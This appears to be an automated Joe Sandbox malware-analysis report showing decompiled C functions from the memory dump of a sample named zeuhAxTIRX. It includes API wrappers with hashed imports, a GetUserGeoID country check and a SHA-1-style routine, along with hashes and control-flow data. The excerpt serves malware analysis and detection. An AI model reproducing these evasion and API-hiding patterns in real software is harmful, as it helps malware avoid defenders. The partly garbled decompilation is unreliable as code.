                                                                                                                • NtReadFile.NTDLL(00E69533,00E649FF,FFFFFFFF,00E6901D,00000002,?,00E69533,00000002,00E6901D,FFFFFFFF,00E649FF,00E69533,00000002,00000000), ref: 00E6E698
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction ID: 0737597aeb93f8f7a9a64e6a7d1f9f4cbd318ca2e5c6b89cc44d46644b190710
                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction Fuzzy Hash: A4F0A4B6204208ABCB14DF99DC85EEB77ADAF8C754F118258BA0DA7251D630E8118BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 143 e6e783-e6e7c0 call e6f213 NtAllocateVirtualMemory
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E783(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                				long _t14;
                                                                                                                
                                                                                                                				_t10 = _a4;
                                                                                                                				_t2 = _t10 + 0x14; // 0x6ad04d03
                                                                                                                				_t3 = _t10 + 0xa8c; // 0xe54023
                                                                                                                				E00E6F213( *_t2, _a4, _t3,  *_t2, 0, 0x30);
                                                                                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                				return _t14;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,00E53597,00000004,00001000,00000000), ref: 00E6E7BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction ID: 1e40515a70f49f649c978f695f4bd8874616aba3c60e2df2000d409f2e4563ad
                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction Fuzzy Hash: 17F015B6200208ABCB14DF89EC85EAB77ADAF88754F018118FE0897241C630F810CBB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 e6e6d3-e6e6fc call e6f213 NtClose
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E6D3(intOrPtr _a4, void* _a8) {
                                                                                                                				long _t8;
                                                                                                                
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                                                                				_t8 = NtClose(_a8); // executed
                                                                                                                				return _t8;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00E60338,00000000,?,00E60338,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E6E6F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction ID: 5685aabfc8b34ab1395b9f2acfca28a52b06277c06d00343105b255f56fe42a9
                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction Fuzzy Hash: 38D012766442146BD610EB98EC49F977B9DDF48660F018455BA1C5B242C570F90086E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00E598AB(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                				char _v67;
                                                                                                                				char _v68;
                                                                                                                				void* _t15;
                                                                                                                				int _t17;
                                                                                                                				long _t30;
                                                                                                                				int _t33;
                                                                                                                				void* _t36;
                                                                                                                				void* _t38;
                                                                                                                				void* _t43;
                                                                                                                
                                                                                                                				_t43 = __eflags;
                                                                                                                				asm("sbb eax, 0xd5f679b5");
                                                                                                                				asm("adc byte [ebp-0x75], 0xec");
                                                                                                                				_t36 = _t38;
                                                                                                                				_v68 = 0;
                                                                                                                				E00E701E3( &_v67, 0, 0x3f);
                                                                                                                				E00E70C93( &_v68, 3);
                                                                                                                				_t21 = _a4;
                                                                                                                				_t15 = E00E5CF33(_t43, _a4 + 0x20,  &_v68); // executed
                                                                                                                				_t17 = E00E69613(_a4 + 0x20, _t15, 0, 0, E00E52E33(0xf19d272b));
                                                                                                                				_t33 = _t17;
                                                                                                                				if(_t33 != 0) {
                                                                                                                					_t30 = _a8;
                                                                                                                					_t17 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
                                                                                                                					if(_t17 == 0) {
                                                                                                                						_t17 =  *_t33(_t30, 0x8003, _t36 + (E00E5C603(1, 8, _t21 + 0x884) & 0x000000ff) - 0x40, _t17);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t17;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0000FF46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E59916
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 46adc3ea296b95d05bf363cc4900f3fd1ed3d1987fdbe4cd8fb4be761481e984
                                                                                                                • Instruction ID: 6258ccead2a580b40539bb3f238450a5c61489d285c2665cf942e7b585ca5187
                                                                                                                • Opcode Fuzzy Hash: 46adc3ea296b95d05bf363cc4900f3fd1ed3d1987fdbe4cd8fb4be761481e984
                                                                                                                • Instruction Fuzzy Hash: 6211DB71A40318BAE721A6A4DC43FEF77AC9F41B51F145518FF44BA1C2D7D4AA0A83E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 106 e598b3-e598c4 107 e598cd-e59907 call e70c93 call e5cf33 call e52e33 call e69613 106->107 108 e598c8 call e701e3 106->108 117 e59940-e59946 107->117 118 e59909-e5991a PostThreadMessageW 107->118 108->107 118->117 119 e5991c-e5993d call e5c603 118->119 119->117
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00E598B3(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                				char _v67;
                                                                                                                				char _v68;
                                                                                                                				void* _t13;
                                                                                                                				int _t15;
                                                                                                                				long _t25;
                                                                                                                				int _t27;
                                                                                                                				void* _t28;
                                                                                                                				void* _t32;
                                                                                                                
                                                                                                                				_t32 = __eflags;
                                                                                                                				_v68 = 0;
                                                                                                                				E00E701E3( &_v67, 0, 0x3f);
                                                                                                                				E00E70C93( &_v68, 3);
                                                                                                                				_t19 = _a4;
                                                                                                                				_t13 = E00E5CF33(_t32, _a4 + 0x20,  &_v68); // executed
                                                                                                                				_t15 = E00E69613(_a4 + 0x20, _t13, 0, 0, E00E52E33(0xf19d272b));
                                                                                                                				_t27 = _t15;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					_t25 = _a8;
                                                                                                                					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                                                                					if(_t15 == 0) {
                                                                                                                						return  *_t27(_t25, 0x8003, _t28 + (E00E5C603(1, 8, _t19 + 0x884) & 0x000000ff) - 0x40, _t15);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t15;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0000FF46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E59916
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 4ca72a9b95d35e80b9f0b5d5fb098524bd240e277037fc7deee9f49694031f50
                                                                                                                • Instruction ID: da46060ccc7bb0754c171214d44dd379fe3b6fa3558f68c72f4ddb77c622f361
                                                                                                                • Opcode Fuzzy Hash: 4ca72a9b95d35e80b9f0b5d5fb098524bd240e277037fc7deee9f49694031f50
                                                                                                                • Instruction Fuzzy Hash: EF019B71A4031476E721A6959C43FEE779C9B40B51F145518FF047A1C1D794AA0A43E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 154 e6e8b3-e6e8e4 call e6f213 RtlFreeHeap
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E8B3(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                				char _t10;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xaa0; // 0xaa0
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                                                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                				return _t10;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 00E6E8E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction ID: f63117f1bf2c928fbceb0381b9517cbdce30462debe3cb2c29b60d2ddd22d863
                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction Fuzzy Hash: B1E04FB56402046FCB14DF89EC49EA737ADEF88750F014054FE0957251C630F910CAF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 146 e600b3-e600d7 call e69613 149 e600db-e600ec GetUserGeoID 146->149 150 e600d9-e600da 146->150
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E600B3(intOrPtr _a4) {
                                                                                                                				intOrPtr* _t7;
                                                                                                                				void* _t8;
                                                                                                                
                                                                                                                				_t7 = E00E69613(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                                                                				if(_t7 != 0) {
                                                                                                                					_t8 =  *_t7(0x10); // executed
                                                                                                                					return 0 | _t8 == 0x000000f1;
                                                                                                                				} else {
                                                                                                                					return _t7;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 00E600DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: User
                                                                                                                • String ID:
                                                                                                                • API String ID: 765557111-0
                                                                                                                • Opcode ID: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                • Instruction ID: d9f560e849790a3954dbf9a4be0563975f6e30856f29757fc9b5b1bc3c6a7087
                                                                                                                • Opcode Fuzzy Hash: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                • Instruction Fuzzy Hash: A4E02B737C030467F730D1E99C46FBA328E5B84B40F048470F90CF72C2D4A4E4800020
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 151 e6e873-e6e8a4 call e6f213 RtlAllocateHeap
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E873(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                				return _t10;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00E68CC9,?,00E69470,00E69470,?,00E68CC9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 00E6E8A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction ID: 30fdbada59b1774b06f3b457e5845dfc668543e9d9ea3656f739ec2434bf0e0a
                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction Fuzzy Hash: FDE04FB56402046BC714DF89EC45E9737ADEF88754F018054FE085B241C630F910CAF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 157 e6ea13-e6ea47 call e6f213 LookupPrivilegeValueW
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6EA13(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                				int _t10;
                                                                                                                
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x160)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x160)), 0, 0x46);
                                                                                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                				return _t10;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E5FF05,00E5FF05,?,00000000,?,?), ref: 00E6EA43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 163 e6e8f3-e6e91f call e6f213 ExitProcess
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E8F3(intOrPtr _a4, int _a8) {
                                                                                                                
                                                                                                                				_t5 = _a4;
                                                                                                                				E00E6F213( *((intOrPtr*)(_a4 + 0x548)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x548)), 0, 0x36);
                                                                                                                				ExitProcess(_a8);
                                                                                                                			}




                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00E6E91B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E00E5BF9D(void* __eax, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t287;
                                                                                                                				void* _t366;
                                                                                                                				void* _t462;
                                                                                                                				void* _t496;
                                                                                                                
                                                                                                                				_t496 = __esi;
                                                                                                                				_t462 = __edi;
                                                                                                                				asm("cld");
                                                                                                                				_pop(es);
                                                                                                                				_t287 = __ecx;
                                                                                                                				_t366 = __eax;
                                                                                                                				asm("in eax, 0x45");
                                                                                                                				if (__eflags > 0) goto L4;
                                                                                                                			}








                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00E5BFDE(signed int* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				char _v304;
                                                                                                                				signed int* _t278;
                                                                                                                				signed int* _t279;
                                                                                                                				signed int _t280;
                                                                                                                				signed int _t286;
                                                                                                                				signed int _t289;
                                                                                                                				signed int _t293;
                                                                                                                				signed int _t296;
                                                                                                                				signed int _t300;
                                                                                                                				signed int _t304;
                                                                                                                				signed int _t306;
                                                                                                                				signed int _t312;
                                                                                                                				signed int _t320;
                                                                                                                				signed int _t322;
                                                                                                                				signed int _t325;
                                                                                                                				signed int _t327;
                                                                                                                				signed int _t336;
                                                                                                                				signed int _t342;
                                                                                                                				signed int _t343;
                                                                                                                				signed int _t348;
                                                                                                                				signed int _t356;
                                                                                                                				signed int _t360;
                                                                                                                				signed int _t361;
                                                                                                                				signed int _t365;
                                                                                                                				signed int _t368;
                                                                                                                				signed int _t372;
                                                                                                                				signed int _t373;
                                                                                                                				signed int _t403;
                                                                                                                				signed int _t408;
                                                                                                                				signed int _t414;
                                                                                                                				signed int _t417;
                                                                                                                				signed int _t424;
                                                                                                                				signed int _t427;
                                                                                                                				signed int _t436;
                                                                                                                				signed int _t438;
                                                                                                                				signed int _t441;
                                                                                                                				signed int _t449;
                                                                                                                				signed int _t451;
                                                                                                                				signed int _t462;
                                                                                                                				signed int _t465;
                                                                                                                				signed int _t466;
                                                                                                                				signed int _t467;
                                                                                                                				signed int _t473;
                                                                                                                				signed int _t481;
                                                                                                                				signed int _t482;
                                                                                                                				signed int* _t483;
                                                                                                                				signed int* _t486;
                                                                                                                				signed int _t493;
                                                                                                                				signed int _t496;
                                                                                                                				signed int _t501;
                                                                                                                				signed int _t504;
                                                                                                                				signed int _t507;
                                                                                                                				signed int _t510;
                                                                                                                				signed int _t511;
                                                                                                                				signed int _t515;
                                                                                                                				signed int _t527;
                                                                                                                				signed int _t530;
                                                                                                                				signed int _t537;
                                                                                                                				void* _t543;
                                                                                                                				void* _t545;
                                                                                                                
                                                                                                                				asm("outsd");
                                                                                                                				_t543 = _t545;
                                                                                                                				_t486 = _a4;
                                                                                                                				_push(_t451);
                                                                                                                				_t356 = 0;
                                                                                                                				_t2 =  &(_t486[7]); // 0x45
                                                                                                                				_t278 = _t2;
                                                                                                                				do {
                                                                                                                					_push(_t278);
                                                                                                                					 *_t451 =  *_t451 - 1;
                                                                                                                					 *(_t543 + _t356 * 4 - 0x14c) = ((0x00000038 << 0x00000008 | _t451) << 0x00000008 | _t278[0] & 0x000000ff) << 0x00000008 | _t278[0] & 0x000000ff;
                                                                                                                					 *(_t543 + _t356 * 4 - 0x148) = (((_t278[0] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff;
                                                                                                                					 *(_t543 + _t356 * 4 - 0x144) = (((_t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
                                                                                                                					_t451 = _t278[3] & 0x000000ff;
                                                                                                                					 *(_t543 + _t356 * 4 - 0x140) = (((_t278[2] & 0x000000ff) << 0x00000008 | _t278[3] & 0x000000ff) << 0x00000008 | _t278[3] & 0x000000ff) << 0x00000008 | _t451;
                                                                                                                					_t356 = _t356 + 4;
                                                                                                                					_t278 =  &(_t278[4]);
                                                                                                                				} while (_t356 < 0x10);
                                                                                                                				_t279 =  &_v304;
                                                                                                                				_v8 = 0x10;
                                                                                                                				do {
                                                                                                                					_t403 =  *(_t279 - 0x18);
                                                                                                                					_t462 =  *(_t279 - 0x14);
                                                                                                                					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t403;
                                                                                                                					asm("rol ecx, 1");
                                                                                                                					asm("rol ebx, 1");
                                                                                                                					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t462;
                                                                                                                					_t279[8] = _t360;
                                                                                                                					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
                                                                                                                					_t279 =  &(_t279[4]);
                                                                                                                					asm("rol ebx, 1");
                                                                                                                					asm("rol edx, 1");
                                                                                                                					_t46 =  &_v8;
                                                                                                                					 *_t46 = _v8 - 1;
                                                                                                                					_t279[6] = _t320 ^ _t403;
                                                                                                                					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t462;
                                                                                                                				} while ( *_t46 != 0);
                                                                                                                				_t322 =  *_t486;
                                                                                                                				_t280 = _t486[1];
                                                                                                                				_t361 = _t486[2];
                                                                                                                				_t408 = _t486[3];
                                                                                                                				_v12 = _t322;
                                                                                                                				_v16 = _t486[4];
                                                                                                                				_v8 = 0;
                                                                                                                				do {
                                                                                                                					asm("rol ebx, 0x5");
                                                                                                                					_t465 = _v8;
                                                                                                                					_t493 = _t322 + ( !_t280 & _t408 | _t361 & _t280) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                                                                					_t325 = _v12;
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_v16 = _t408;
                                                                                                                					_v12 = _t493;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v8 = _t361;
                                                                                                                					_t414 = _t493 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                					_t496 = _t280;
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_v16 = _v8;
                                                                                                                					_t365 = _v12;
                                                                                                                					_v8 = _t325;
                                                                                                                					_t327 = _v8;
                                                                                                                					_v12 = _t414;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					_t286 = _t414 + ( !_t365 & _t496 | _t325 & _t365) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                					_t417 = _v12;
                                                                                                                					_v16 = _t496;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_v8 = _t365;
                                                                                                                					_v12 = _t286;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_v16 = _t327;
                                                                                                                					_t501 = _t286 + ( !_t417 & _t327 | _t365 & _t417) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                					_t361 = _v12;
                                                                                                                					_t289 = _v8;
                                                                                                                					asm("ror edx, 0x2");
                                                                                                                					_v8 = _t417;
                                                                                                                					_v12 = _t501;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_v16 = _t289;
                                                                                                                					_t280 = _v12;
                                                                                                                					_t504 = _t501 + ( !_t361 & _t289 | _t417 & _t361) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                					_t408 = _v8;
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t466 = _t465 + 5;
                                                                                                                					_t322 = _t504;
                                                                                                                					_v12 = _t322;
                                                                                                                					_v8 = _t466;
                                                                                                                				} while (_t466 < 0x14);
                                                                                                                				_t467 = 0x14;
                                                                                                                				do {
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					asm("ror eax, 0x2");
                                                                                                                					_v16 = _t408;
                                                                                                                					_t507 = _t504 + (_t408 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                					_t336 = _v12;
                                                                                                                					_v12 = _t507;
                                                                                                                					asm("rol esi, 0x5");
                                                                                                                					_t424 = _t507 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                					asm("ror ebx, 0x2");
                                                                                                                					_t510 = _t280;
                                                                                                                					_v16 = _t361;
                                                                                                                					_t368 = _v12;
                                                                                                                					_v12 = _t424;
                                                                                                                					asm("rol edx, 0x5");
                                                                                                                					asm("ror ecx, 0x2");
                                                                                                                					_t293 = _t424 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                					_t427 = _v12;
                                                                                                                					_v8 = _t336;
                                                                                                                					_v8 = _t368;
                                                                                                                					_v12 = _t293;
                                                                                                                					asm("rol eax, 0x5");
                                                                                                                					_t467 = _t467 + 5;
                                                                                                                					_t361 = _v12;
                                                                                                                					asm("ror edx, 0x2");
